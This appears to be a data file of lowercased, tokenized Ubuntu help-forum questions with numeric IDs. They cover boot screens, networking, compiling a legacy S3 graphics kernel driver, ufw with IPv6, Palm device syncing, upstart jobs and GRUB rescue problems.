421902	ubuntu splash screen not showing at boot	when i boot my mbp 2010 15 inch i go to the purple screen to choose the os to load ( in my case windows , mac , ubuntu ) . when i click ubuntu it goes to a terminal like screen and says some technical computer jargon . and then ubuntu boots.but i thought there was supposed to be a cool ubuntu loading screen that was animated . how do i get the normal ubuntu loading screen to boot ? and is it possible to make a custom loading screen for ubuntu ?
421904	does the linux-generic package have both the headers and the image ? and how to install	i 'm trying to make my own distro based on ubuntu . however remastersys requires an official ubuntu kernel to work ( at least on the ubuntu version of remastersys ) . i want to know if the linux-generic package really has the headers and image . the version that i 'm aiming for can be found here : http : //packages.ubuntu.com/trusty/kernel/linux-generic and my distro is based off of ubuntu 12.04 . i 'd also like to know how to install it
421905	ubuntu not detecting wired connection	i just installed ubuntu 12.04 ( desktop version ) to my viewsonic viewbook a few days ago and am having trouble with networking . specifically , my wired connection is not being detected / connected . wi-fi appears to be working . - i am using a linksys ea 6200 router has this anything to do with it being iv6 ? switching to an older non-gigabit router works . i 've found a similar situation faced previously . i am using a jmc250 ethernet adaptop . http : //ubuntuforums.org/showthread.php ? t=2102394 i 've tried all the suggested steps but no luck . any ubuntu genius can help ?
421907	driver compile problem	i am attempting to compile & install a video driver for my mythbuntu frontend box . unfortunately it includes an onboard gpu that is not too popular . the drivers are for a s3 chrome 450 ulp graphics card . and i am using mythbuntu 12.04.3 here is my process , do not assume i know what i am doing . first , when i ran the `` make '' command i received : error : linux/smp_lock.h : no such file or directory so therefore , i changed all instances of `` linux/smp_lock.h '' to `` linux/smp.h '' this made the error go away when attempting to compile , but it presented me with a new error : error : 'vm_reserved ' undeclared ( first use of this function ) then , i changed `` vm_reserved '' to `` ( vm_dontexpand | vm_dontdump ) '' and this fixed the above error . now , i am receiving a new error to which i am currently stuck at and need the help of someone who is smarter at compiling than me . error : implicit declaration of function 'lock_kernel ' [ -werror=implicit-function-declaration ] here is the source file in reference to the above error : # include `` s3gkeapi.h '' # define s3g_command_base s3g_ioctl_nr ( s3g_ioctl_command_base ) static int s3g_setup ( s3g_device_t* dev ) { atomic_set ( & dev- > ioctl_count , 0 ) ; dev- > ctxlist = s3g_calloc ( sizeof ( *dev- > ctxlist ) ) ; if ( dev- > ctxlist == null ) { return -enomem ; } init_list_head ( & dev- > ctxlist- > head ) ; dev- > sigdata.lock = dev- > lock.hw_lock = s3g_calloc ( sizeof ( s3g_hw_lock_t ) ) ; init_waitqueue_head ( & dev- > lock.lock_queue ) ; return 0 ; } int s3g_open ( struct inode* inode , struct file* filp ) { s3g_device_t* dev = null ; s3g_file_t* priv ; # ifndef kernel_2_4 int minor = iminor ( inode ) ; # else int minor = minor ( inode- > i_rdev ) ; # endif int err = -enodev ; if ( ! ( ( minor > = 0 ) & & ( minor < cards_limit ) ) ) { return err ; } if ( ! s3g_cards [ minor ] ) { return err ; } if ( ! ( dev = s3g_cards [ minor ] - > dev ) ) { return -err ; } priv = s3g_calloc ( sizeof ( *priv ) ) ; if ( ! priv ) { return -enomem ; } // intilialize file private data filp- > private_data = priv ; priv- > uid = s3g_get_euid ( ) ; priv- > pid = __s3gke_getpid ( ) ; priv- > minor = minor ; priv- > head = s3g_cards [ minor ] ; priv- > ioctl_count = 0 ; priv- > lock_count = 0 ; priv- > filp = filp ; down ( & dev- > struct_sem ) ; if ( ! dev- > file_last ) { priv- > next = null ; priv- > prev = null ; dev- > file_first = priv ; dev- > file_last = priv ; } else { priv- > next = null ; priv- > prev = dev- > file_last ; dev- > file_last- > next = priv ; dev- > file_last = priv ; } up ( & dev- > struct_sem ) ; spin_lock ( & dev- > count_lock ) ; if ( ! dev- > open_count++ ) { spin_unlock ( & dev- > count_lock ) ; return s3g_setup ( dev ) ; } spin_unlock ( & dev- > count_lock ) ; return 0 ; } int s3g_release ( struct inode* inode , struct file* filp ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev ; lock_kernel ( ) ; dev = priv- > head- > dev ; if ( priv- > lock_count & & dev- > lock.hw_lock & & s3g_lock_is_held ( dev- > lock.hw_lock- > lock ) & & dev- > lock.filp == filp ) { s3g_lock_free ( dev , & dev- > lock.hw_lock- > lock , s3g_locking_context ( dev- > lock.hw_lock- > lock ) ) ; } down ( & dev- > ctxlist_sem ) ; if ( dev- > ctxlist & & ( ! list_empty ( & dev- > ctxlist- > head ) ) ) { s3g_ctx_list_t* pos , *n ; list_for_each_entry_safe ( pos , n , & dev- > ctxlist- > head , head ) { if ( pos- > tag == priv & & pos- > handle ! = s3g_kernel_context ) { s3g_ctxbitmap_free ( dev , pos- > handle ) ; list_del ( & pos- > head ) ; s3g_free ( pos ) ; -- dev- > ctx_count ; } } } up ( & dev- > ctxlist_sem ) ; down ( & dev- > struct_sem ) ; if ( priv- > prev ) { priv- > prev- > next = priv- > next ; } else { dev- > file_first = priv- > next ; } if ( priv- > next ) { priv- > next- > prev = priv- > prev ; } else { dev- > file_last = priv- > prev ; } up ( & dev- > struct_sem ) ; s3g_driver_cleanup ( filp ) ; s3g_free ( priv ) ; spin_lock ( & dev- > count_lock ) ; if ( ! -- dev- > open_count ) { if ( atomic_read ( & dev- > ioctl_count ) ) //|| dev- > blocked ) { spin_unlock ( & dev- > count_lock ) ; unlock_kernel ( ) ; return -ebusy ; } spin_unlock ( & dev- > count_lock ) ; unlock_kernel ( ) ; return s3g_lastclose ( dev ) ; } spin_unlock ( & dev- > count_lock ) ; unlock_kernel ( ) ; return 0 ; } unsigned int s3g_poll ( struct file *filp , struct poll_table_struct *wait ) { return 0 ; } int s3g_fasync ( int fd , struct file* filp , int on ) { return 0 ; } int s3g_get_busid ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; s3g_unique_t __user* argp = ( void __user* ) arg ; s3g_unique_t u ; s3g_debug ( `` enter get bus id ioctl\n '' ) ; if ( copy_from_user ( & u , argp , sizeof ( u ) ) ) { return -efault ; } if ( u.unique_len > = dev- > unique_len ) { if ( copy_to_user ( u.unique , dev- > unique , dev- > unique_len ) ) { return -efault ; } } u.unique_len = dev- > unique_len ; if ( copy_to_user ( argp , & u , sizeof ( u ) ) ) { return -efault ; } return 0 ; } int s3g_ioctl_get_display_info ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; s3g_display_info_t display_info ; s3g_framebuffer* fb ; int server_index = 0 ; int screen_index = 0 ; void __user* argp = ( void __user* ) arg ; int i ; int retval = 0 ; int found = 0 ; down ( & dev- > struct_sem ) ; if ( copy_from_user ( & display_info , argp , sizeof ( s3g_display_info_t ) ) ) { up ( & dev- > struct_sem ) ; return -efault ; } server_index = display_info.server_index ; screen_index = display_info.screen_index ; fb = ( s3g_framebuffer* ) s3g_get_fb ( dev- > hadapter , server_index , screen_index ) ; if ( fb == null ) { retval = -einval ; goto out ; } display_info.bxinerama = s3g_servers [ server_index ] .bxinerama ; display_info.bufbpp = fb- > bits_per_pixel/8 ; display_info.buserxa = fb- > use_rxa ; display_info.bduoview = fb- > duoview ; for ( i = 0 ; i < max_igas ; i++ ) { fb = s3g_get_fb_per_iga ( dev- > hadapter , i ) ; if ( fb & & fb- > server_index == server_index ) { display_info.iga2scrnindex [ i ] = fb- > scrnindex ; } else { display_info.iga2scrnindex [ i ] = -1 ; } } if ( copy_to_user ( argp , & display_info , sizeof ( display_info ) ) ) { retval = -einval ; goto out ; } out : up ( & dev- > struct_sem ) ; return retval ; } int s3g_ioctl_get_iga_info ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; s3g_iga_info_t iga_info ; void __user* argp = ( void __user* ) arg ; down ( & dev- > struct_sem ) ; if ( copy_from_user ( & iga_info , argp , sizeof ( s3g_iga_info_t ) ) ) { up ( & dev- > struct_sem ) ; return -efault ; } s3g_get_iga_info ( dev- > hadapter , & iga_info ) ; up ( & dev- > struct_sem ) ; copy_to_user ( argp , & iga_info , sizeof ( s3g_iga_info_t ) ) ; return 0 ; } int s3g_ioctl_clip_notify ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_clipnotify_t __user* argp = ( void __user* ) arg ; s3g_clipnotify_t clip ; s3g_framebuffer *fb ; s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; int i ; if ( copy_from_user ( & clip , argp , sizeof ( clip ) ) ) { return -efault ; } if ( clip.scrnindex > 4 ) { return -efault ; } down ( & s3g_draw_sem ) ; if ( clip.kdrawid ! = 0 ) { i = clip.kdrawid ; s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .x = clip.x ; s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .y = clip.y ; s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .width = clip.width ; s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .height = clip.height ; s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .numcliprects = clip.numcliprects ; if ( clip.hallocation ) { s3g_drawables [ i ] .hallocation = clip.hallocation ; } else { fb = s3g_get_fb ( dev- > hadapter , s3g_drawables [ i ] .server_index , clip.scrnindex ) ; s3g_drawables [ i ] .hallocation = fb- > hallocation ; } if ( clip.numcliprects ) { if ( s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .cliprects == 0 ) { s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .cliprects = s3g_malloc ( sizeof ( s3g_clip_rect_t ) *64 ) ; } memcpy ( s3g_drawables [ i ] .clipnotify [ clip.scrnindex ] .cliprects , clip.cliprects , sizeof ( s3g_clip_rect_t ) *clip.numcliprects ) ; } } up ( & s3g_draw_sem ) ; return 0 ; } // add kernel drawable // and return a kernel drawable id to user mode // note the id is start from 1 // clip list management use index 0 int s3g_ioctl_adddraw ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; unsigned int __user* argp = ( void __user* ) arg ; unsigned int xid ; int i ; unsigned int drawid = 0 ; int found = 0 ; int server_index ; s3g_drawable_t drawable ; if ( copy_from_user ( & drawable , argp , sizeof ( s3g_drawable_t ) ) ) { return -efault ; } xid = drawable.xid ; server_index = drawable.server_index ; down ( & s3g_draw_sem ) ; for ( i = 1 ; i < s3g_max_drawables ; i++ ) { if ( s3g_drawables [ i ] .xid == xid & & s3g_drawables [ i ] .server_index ) { s3g_drawables [ i ] .refcount++ ; found = 1 ; drawid = i ; break ; } } if ( ! found ) { for ( i = 1 ; i < s3g_max_drawables ; i++ ) { if ( s3g_drawables [ i ] .xid == 0 ) { s3g_drawables [ i ] .server_index = server_index ; s3g_drawables [ i ] .xid = xid ; s3g_drawables [ i ] .refcount++ ; found = 1 ; drawid = i ; break ; } } } if ( server_index == 0 ) { // nox driver has no clip notify mechanism , so set fb size as drawable size s3g_framebuffer* fb = ( s3g_framebuffer* ) s3g_get_fb ( dev- > hadapter , 0 , 0 ) ; i = drawid ; s3g_drawables [ i ] .clipnotify [ 0 ] .x =0 ; s3g_drawables [ i ] .clipnotify [ 0 ] .y = 0 ; s3g_drawables [ i ] .clipnotify [ 0 ] .width = fb- > width ; s3g_drawables [ i ] .clipnotify [ 0 ] .height = fb- > height ; s3g_drawables [ i ] .clipnotify [ 0 ] .numcliprects = 1 ; if ( s3g_drawables [ i ] .clipnotify [ 0 ] .cliprects == 0 ) { s3g_drawables [ i ] .clipnotify [ 0 ] .cliprects = s3g_malloc ( sizeof ( s3g_clip_rect_t ) *1 ) ; } s3g_drawables [ i ] .clipnotify [ 0 ] .cliprects [ 0 ] .x1 = 0 ; s3g_drawables [ i ] .clipnotify [ 0 ] .cliprects [ 0 ] .y1 = 0 ; s3g_drawables [ i ] .clipnotify [ 0 ] .cliprects [ 0 ] .x2 = fb- > width ; s3g_drawables [ i ] .clipnotify [ 0 ] .cliprects [ 0 ] .y2 = fb- > height ; s3g_drawables [ i ] .hallocation = fb- > hallocation ; } up ( & s3g_draw_sem ) ; if ( found ) { drawable.xid = drawid ; if ( copy_to_user ( argp , & drawable , sizeof ( drawable ) ) ) { return -efault ; } } else { return -efault ; } return 0 ; } int s3g_ioctl_rmdraw ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { unsigned int __user* argp = ( void __user* ) arg ; unsigned int drawid = *argp ; int i ; if ( drawid > = s3g_max_drawables ) { return -efault ; } down ( & s3g_draw_sem ) ; if ( ! ( -- s3g_drawables [ drawid ] .refcount ) ) { for ( i = 0 ; i < 4 ; i++ ) { if ( s3g_drawables [ drawid ] .clipnotify [ i ] .cliprects ) { s3g_free ( s3g_drawables [ drawid ] .clipnotify [ i ] .cliprects ) ; } } memset ( & s3g_drawables [ drawid ] , 0 , sizeof ( s3g_drawable_t ) ) ; } up ( & s3g_draw_sem ) ; return 0 ; } int s3g_ioctl_get_drawsize ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; s3g_get_drawsize_t __user* argp = ( void __user* ) arg ; s3g_framebuffer* fb ; int server_index ; unsigned int drawid = argp- > drawid ; s3g_get_drawsize_t drawrec ; int i ; if ( drawid > s3g_max_drawables ) { return -efault ; } memset ( & drawrec , 0 , sizeof ( drawrec ) ) ; down ( & s3g_draw_sem ) ; // for samm case // xinerama : drawable size is the same for all screen , so any screen is ok. // individual displays : the clip list and drawable size is just stored acording to the scrnindex // and there is just one entry , so need to search to get it . for ( i = 0 ; i < 4 ; i++ ) { if ( s3g_drawables [ drawid ] .clipnotify [ i ] .width ! = 0 ) { drawrec.drawid = drawid ; drawrec.rect.x1 = s3g_drawables [ drawid ] .clipnotify [ i ] .x ; drawrec.rect.y1 = s3g_drawables [ drawid ] .clipnotify [ i ] .y ; drawrec.rect.x2 = s3g_drawables [ drawid ] .clipnotify [ i ] .width + drawrec.rect.x1 ; drawrec.rect.y2 = s3g_drawables [ drawid ] .clipnotify [ i ] .height + drawrec.rect.y1 ; break ; } } if ( i > = 4 ) { up ( & s3g_draw_sem ) ; return -efault ; } server_index = s3g_drawables [ drawid ] .server_index ; drawrec.server_index = server_index ; drawrec.scrnindex = i ; drawrec.fullscreen = s3g_drawable_fullscreen ( dev- > hadapter , & drawrec ) ; /* if rotation is available , fullscreen mode is not supported */ fb = ( s3g_framebuffer* ) s3g_get_fb ( dev- > hadapter , server_index , i ) ; drawrec.fullscreen & = ! ( fb- > rotate ) ; drawrec.redirect = ( fb- > hallocation ! = s3g_drawables [ drawid ] .hallocation ) ; up ( & s3g_draw_sem ) ; if ( copy_to_user ( argp , & drawrec , sizeof ( drawrec ) ) ) { return -efault ; } return 0 ; } int s3g_ioctl_get_mode_config ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; s3g_get_mode_config ( dev- > hadapter , argp ) ; return 0 ; } int s3g_ioctl_get_connector ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; s3g_get_connector ( dev- > hadapter , argp ) ; return 0 ; } int s3g_ioctl_mode_set ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; s3g_modeset_t mode_set ; if ( copy_from_user ( & mode_set , argp , sizeof ( s3g_modeset_t ) ) ) { return -efault ; } mode_set.fb = s3g_get_fb ( dev- > hadapter , mode_set.server_index , mode_set.fb_id ) ; s3g_mode_set ( dev- > hadapter , & mode_set ) ; return 0 ; } int s3g_ioctl_cursor ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; s3g_cursorset_t cursor_set ; if ( copy_from_user ( & cursor_set , argp , sizeof ( s3g_cursorset_t ) ) ) { return -efault ; } s3g_set_cursor ( dev- > hadapter , & cursor_set ) ; return 0 ; } int s3g_ioctl_gamma ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; int ret = -efault ; s3g_gamma_set_t gamma_set ; char* red = s3g_malloc ( 256 + 256 + 256 ) ; char* green = red + 256 ; char* blue = red + 256 + 256 ; if ( ! copy_from_user ( & gamma_set , argp , sizeof ( gamma_set ) ) & & ! copy_from_user ( red , gamma_set.red , 256 ) & & ! copy_from_user ( green , gamma_set.green , 256 ) & & ! copy_from_user ( blue , gamma_set.blue , 256 ) ) { gamma_set.red = red ; gamma_set.green = green ; gamma_set.blue = blue ; s3g_set_gamma ( dev- > hadapter , & gamma_set ) ; ret = 0 ; } s3g_free ( red ) ; return ret ; } int s3g_ioctl_dpms ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; s3g_dpms_set_t dpms_set ; if ( copy_from_user ( & dpms_set , argp , sizeof ( dpms_set ) ) ) { return -efault ; } s3g_set_dpms ( dev- > hadapter , & dpms_set ) ; return 0 ; } int s3g_ioctl_get_mode_timing ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; s3g_mode_timing_info_t timing_info ; if ( copy_from_user ( & timing_info , argp , sizeof ( timing_info ) ) ) { return -efault ; } if ( s3g_get_mode_timing ( dev- > hadapter , & timing_info ) ) { return -efault ; } if ( copy_to_user ( argp , & timing_info , sizeof ( timing_info ) ) ) { return -efault ; } return 0 ; } int s3g_ioctl_leave_vt ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; /*if have fb driver , just return*/ if ( ! dev- > nofb ) { return 0 ; } s3g_leave_vt ( dev- > hadapter ) ; return 0 ; } int s3g_ioctl_check_device_combination ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; void __user* argp = ( void __user* ) arg ; s3g_check_device_combination_t device_combination ; if ( copy_from_user ( & device_combination , argp , sizeof ( device_combination ) ) ) { return -efault ; } if ( s3g_check_device_combination ( dev- > hadapter , & device_combination ) ) { return -efault ; } if ( copy_to_user ( argp , & device_combination , sizeof ( device_combination ) ) ) { return -efault ; } return 0 ; } s3g_ioctl_t s3g_common_ioctls [ ] = { [ s3g_ioctl_nr ( s3g_ioctl_get_busid ) ] = s3g_get_busid , [ s3g_ioctl_nr ( s3g_ioctl_get_displayinfo ) ] = s3g_ioctl_get_display_info , [ s3g_ioctl_nr ( s3g_ioctl_get_igainfo ) ] = s3g_ioctl_get_iga_info , [ s3g_ioctl_nr ( s3g_ioctl_add_ctx ) ] = s3g_addctx , [ s3g_ioctl_nr ( s3g_ioctl_rm_ctx ) ] = s3g_rmctx , [ s3g_ioctl_nr ( s3g_ioctl_lock ) ] = s3g_lock , [ s3g_ioctl_nr ( s3g_ioctl_unlock ) ] = s3g_unlock , [ s3g_ioctl_nr ( s3g_ioctl_clip_notify ) ] = s3g_ioctl_clip_notify , [ s3g_ioctl_nr ( s3g_ioctl_add_draw ) ] = s3g_ioctl_adddraw , [ s3g_ioctl_nr ( s3g_ioctl_rm_draw ) ] = s3g_ioctl_rmdraw , [ s3g_ioctl_nr ( s3g_ioctl_get_drawsize ) ] = s3g_ioctl_get_drawsize , [ s3g_ioctl_nr ( s3g_ioctl_get_mode_config ) ] = s3g_ioctl_get_mode_config , [ s3g_ioctl_nr ( s3g_ioctl_get_output ) ] = s3g_ioctl_get_connector , [ s3g_ioctl_nr ( s3g_ioctl_mode_set ) ] = s3g_ioctl_mode_set , [ s3g_ioctl_nr ( s3g_ioctl_cursor ) ] = s3g_ioctl_cursor , [ s3g_ioctl_nr ( s3g_ioctl_gamma ) ] = s3g_ioctl_gamma , [ s3g_ioctl_nr ( s3g_ioctl_dpms ) ] = s3g_ioctl_dpms , [ s3g_ioctl_nr ( s3g_ioctl_get_mode_timing ) ] = s3g_ioctl_get_mode_timing , [ s3g_ioctl_nr ( s3g_ioctl_leave_vt ) ] = s3g_ioctl_leave_vt , [ s3g_ioctl_nr ( s3g_ioctl_check_device_combination ) ] = s3g_ioctl_check_device_combination , } ; extern s3g_ioctl_t s3g_ioctls [ ] ; int s3g_ioctl ( struct inode* inode , struct file* filp , unsigned int cmd , unsigned long arg ) { s3g_file_t* priv = filp- > private_data ; s3g_device_t* dev = priv- > head- > dev ; s3g_ioctl_t func = null ; unsigned int nr = s3g_ioctl_nr ( cmd ) ; int ret = -einval ; atomic_inc ( & dev- > ioctl_count ) ; ++priv- > ioctl_count ; if ( nr < sizeof ( s3g_common_ioctls ) /sizeof ( s3g_ioctl_t ) ) { func = s3g_common_ioctls [ nr ] ; } else if ( nr > = s3g_command_base ) { func = s3g_ioctls [ nr - s3g_command_base ] ; } ret = func ( inode , filp , cmd , arg ) ; return ret ; } # if defined ( __x86_64__ ) & & defined ( have_compat_ioctl ) long s3g_compat_ioctl ( struct file* filp , unsigned int cmd , unsigned long arg ) { return s3g_ioctl ( filp- > f_dentry- > d_inode , filp , cmd , arg ) ; } # endif
421908	why is ubuntu.com partially in chinese for me ?	every time i go to ubuntu.com some of the text is in chinese . no matter what computer i log in from . i am based in the usa and this is the only site i 've encountered that does this to me . i have included a link to a video showing what i am talking about . http : //www.youtube.com/watch ? v=l9rw-3kwssq
421909	graphical error after upgrading from 12.04 lts to 12.10	after updating my ubuntu version from 12.04 to 12.10 , i get a weird and very annoying error on startup . it states something about my graphics card , but it goes away too fast for me to be able to read in full . then the os proceeds to launch ( with the dot thingies ) , but automatically fills all 5 dots , then my screen turns off completely , forcing me to manually turn off my laptop by holding the power button down , which i do n't like doing . when i turn my laptop on again , it will either boot normally , or go into the advanced boot screen . when it boots in the advanced screen , i try recovery mode . then when i try booting in graphic fail safe mode , i get a fatal error saying i dont have any screens connected ! ! ! i am completely lost and greatly need help asap
421913	inconsistent usb write/copy speeds ; cache problem ?	foremost , slow usb write/copy speeds seem to be a hackneyed topic . but this issue is one i 've not seen presented elsewhere . thanks for showing this novice your support . i 'm copying the same .iso file to batches of 18 daisy-chained 2.0 usb devices via unetbootin . i format and partition with gparted ; setting them up to fat32 . sometimes the transfer process takes 30 minutes , while subsequent batches take up to 2.5 hours . assuming it 'd help , i made a copy of the .iso file so that all 18 usbs are n't pulling from the same file . i also reboot before performing each `` batch '' . what 's the reason for these speed inconsistencies ? is there a cache or swapping resolution that can keep the speeds at a constant 30 mins ? thanks !
421915	make install webconf	bonjour , j'ai commencé l’installation de nagios en suivant le guide d’installation dans le site officiel de nagios3.0b5 mais j'ai rencontré un pbm lors de la configuration du l'interface web de nagios . lorsque j'ai exécute la commande make install-webconf ce message ma était afficher : make : * pas de règle pour fabriquer la cible « install-webconf » . arrêt . google translate to english : hello , i started installing nagios following the installation guide in the official website of nagios 3.0 b5 but i met a problem when configuring the web interface of nagios . when i execute the command make install-webconf this message was seen : make : * no rule to make the `` install-webconf '' target . stop .
421917	sme client disconnects very quickly	i 've followed a tutorial about how to access my skydrive folder in ubuntu via sme client . but there 's a problem . after i have the cloud `` drive '' connected , i tried to make one of the folders in it my eclipse workspace . that failed . and when i went to figure out what was happening , i got this error message : error : error when getting information for file '/home/eaglgenes101/skydrive ' : transport endpoint is not connected please select another viewer and try again . looking further , i tried setting up the pretend drive and simply letting it wait around a few minutes , and it became like this all on its own ( so i do n't think eclipse was the problem ) . how can i prevent this from happening ?
421918	ufw , ipv6 , and https	i 'm running kubuntu 13.10 . i recently enabled ipv6 , and setup ufw to support it . everything seems to be working as expected , except i 've noticed certain traffic being blocked with an audit-invalid message . this happens when i access any https google operated website with my browser and leave it open for a few seconds . this traffic tends to be from google , from port 443 , though i do n't know that it 's exclusively google sites or https in general . traffic from google , from port 443 , using ipv4 is accepted by ufw as it should be , while similar ipv6 traffic is blocked . the result is that pages do not load , or do not finish loading . pages that do load seemingly stop working shortly after , links do not open new pages . i would n't want to allow traffic from any source from port 443 , but i made such a rule just to test the results . this traffic was still blocked and tagged as audit-invalid . should n't there be some stateful packet inspection thing going on to allow google to send ssl packets to me when i have an open connection ? if i ca n't find a solution to this problem , i 'm afraid my experimentation with ipv6 will be coming to an end . i sort of need to use google services , and i need to have the firewall enabled , the only part of the equation that i can eliminate is ipv6 , but i would prefer to find a better solution . below are two lines from ufw.log that show an example of the symptom . feb 16 18:31:39 xxxxxxxx kernel : [ 48425.624618 ] [ ufw audit invalid ] in=eth0 out= mac=00:0c:29 : fb : fe:0a:30:60:23:59:00 : b0:86 : dd src=2607 : f8b0:4010:0801:0000:0000:0000:100f dst=xxxx : xxxx : xxxx : xxxx : b40d : a680:22e8:9b70 len=60 tc=0 hoplimit=56 flowlbl=0 proto=tcp spt=443 dpt=46734 window=0 res=0x00 rst urgp=0 feb 16 18:31:39 xxxxxxxx kernel : [ 48425.624644 ] [ ufw block ] in=eth0 out= mac=00:0c:29 : fb : fe:0a:30:60:23:59:00 : b0:86 : dd src=2607 : f8b0:4010:0801:0000:0000:0000:100f dst=xxxx : xxxx : xxxx : xxxx : b40d : a680:22e8:9b70 len=60 tc=0 hoplimit=56 flowlbl=0 proto=tcp spt=443 dpt=46734 window=0 res=0x00 rst urgp=0
421920	can not sync with jpilot	i have ubuntu 12 and jpilot 1.8 but can not sync with my old palm zire via usb port . what i get is : syncing on device /dev/ttyusb0 press the hotsync button now pi_bind error : /dev/ttyusb0 no such file or directory check your sync port and settings exiting with status sync_error_bind finished . i am guessing the solution is something about creating or linking the port with the jpilot but not sure how to turn this idea into commands to execute . jpilot manual is kind of for linux-oriented guys . i am just a computer user guy , not expert . will appreciate help . update : i did change jpilot settings to sync port usb : with this change i get no error and it seems like trying because now i get a x over the sync key . it just never sync . of course i did press sync on my palm first . then i did the opposite but just the same . palm stall . syncing on device usb : press the hotsync button now cancelling hotsync i guess my palm is detected by usb , it just does not sync . $ lsusb bus 001 device 002 : id 04f2 : b071 chicony electronics co. , ltd 2.0m uvc webcam / cnf7129 bus 002 device 002 : id 0458:0056 kye systems corp. ( mouse systems ) ergo 300 mouse bus 003 device 004 : id 0830:0060 palm , inc. tungsten c/e/t/t2/t3 / zire 71 any idea out there ? ? ? now i am trying to do ln and chmod commands listed in the manual but all them fail . lachica @ lachica-1000 : ~ $ chmod 666 /dev/bus/usb/001 chmod : changing permissions of /dev/bus/usb/001 ' : operation not permitted lachica @ lachica-1000 : ~ $ ln -s /dev/bus/usb/001 /dev/pilot ln : failed to create symbolic link/dev/pilot ' : permission denied lachica @ lachica-1000 : ~ $ chmod 666 /dev/bus/usb/001 chmod : changing permissions of `/dev/bus/usb/001 ' : operation not permitted lachica @ lachica-1000 : ~ $ i did sudo usermod -a -g dialout with my user name and it seems command execution was ok but still sync does nothing . i am lost and tired searching web ...
421923	how can i make sure one upstart job stops before another upstart job stops ?	sometimes my server is shut down via an acpi shutdown , and i 've managed to get my process to gracefully shut down . however , my process ( job a ) relies on another process ( job b ) during its graceful shutdown , so i now want to make sure that job b does n't stop until job a has stopped . both processes are upstart jobs , so i 've tried doing this by adding this to job b 's /etc/init file : # do n't stop until job a stops pre-stop script while true do status a | grep -q `` stop/waiting '' & & exit 0 sleep 1 done end script this does n't seem to work ; when i shutdown my server via acpi shutdown , job b usually shuts down before job a , such that job a spits out error messages about job b not being up . is there something wrong with my script ? is there another approach i should be taking ? or is it not possible to do what i want with upstart ? related question : stop job before it 's dependencies
421925	will unity 3d on older computers work with 13.10	basically , i have an older computer which is why i put ubuntu on for its speed . at first i had 12.04 that ran ubuntu 2d because 3d was very slow on the nvidia geforce 5200 card in it . when i updated to 12.10 unity 2d was discontinued and because it was forcing my computer to run unity 3d the desktop kept crashing leaving me to use gnome desktop . ive seen that 13.10 has improvements and what not , but if i update to it , will the 3d for me still crash or was it optimized for better performance ? if it isnt , then i wont bother updating from 12.10 .
421930	will ubuntu ever be available on the hisense sero 7 ?	will ubuntu ever be available on the hisense sero 7 ? if so , how do i install it ?
421932	grub error , ca n't go to bios	whenever i power up the computer , it types a little message `` system resuming '' . then it comes up with the following message . error : unknown filesystem grub rescue > i tried to pull out the battery to see whether the computer restarts or not but to no avail . at the bottom , there is a message : `` system resuming '' no matter what i do . i followed the instruction from the following link : https : //help.ubuntu.com/community/grub2/troubleshooting # search_.26_set following are the steps i followed : in the grub rescue prompt . i typed : set prefix= ( hd0,6 ) /boot/grub set root= ( hd0,6 ) then if i type ls ( hd0,6 ) /boot/grub/ i see all the mod files but when i do insmod normal it says '/boot/grub/i386-pc/normal.mod not found . then i typed the full path insmod /boot/brub/normal but we end up with the same message . what is confounding is that why reference of 'i386-pc ' is coming up . does it have anything to do with grub.cfg file ? i do n't seem to find that file . this has left me stumped for days now . any suggestions will be highly appreciated .
421936	ca n't install ubuntu in hp pavilion kernel not supported	i bought a new hp pavilion laptop with amd a10 processor . while trying to install ubuntu it shows that graphics is not supported . and the installation fails corrupting the mbr . i tried to install it in virtual box also then it shows that the kernel is not supported . i tried ubuntu 10 to 13 but its not installing . how can i fix this ?
